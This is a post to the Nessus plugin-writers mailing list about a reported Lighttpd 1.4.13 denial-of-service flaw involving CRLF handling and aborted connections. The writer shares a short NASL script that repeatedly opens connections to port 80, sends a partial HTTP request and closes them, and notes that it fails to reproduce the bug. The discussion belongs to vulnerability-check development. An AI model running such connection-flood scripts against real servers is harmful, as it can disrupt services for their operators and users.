"Robert Jakabosky discovered an infinite loop triggered
by a connection
abort when Lighttpd processes carriage return and line feed
sequences."
Could anybody reproduce this DoS? I recompile a lighttpd
1.4.13, but
this script does not work.
The server rejects connections for about one minute
(because
all ports are saturated with sockets in TIME_WAIT state),
but it only
affects the attacking source IP and there is no CPU loop.
$ more /tmp/ec.nasl
i= 0;
while (s = open_sock_tcp(80))
{
i ++;
send(socket: s, data: 'GET / HTTP/1.0rn');
close(s);
}
display(i, ' donen');
$
--
http://www.bigfoot.com/
~arboi http://ma75.blogspot.com/
PGP key ID : 0x0BBABA91 - 0x1320924F0BBABA91
Fingerprint: 1048 B09B EEAF 20AA F645 2E1A 1320 924F 0BBA
BA91
_______________________________________________
Plugins-writers mailing list
Plugins-writers list.nessus.org
http://mail.nessus.org/mailman/listinfo/plugins-writers
|
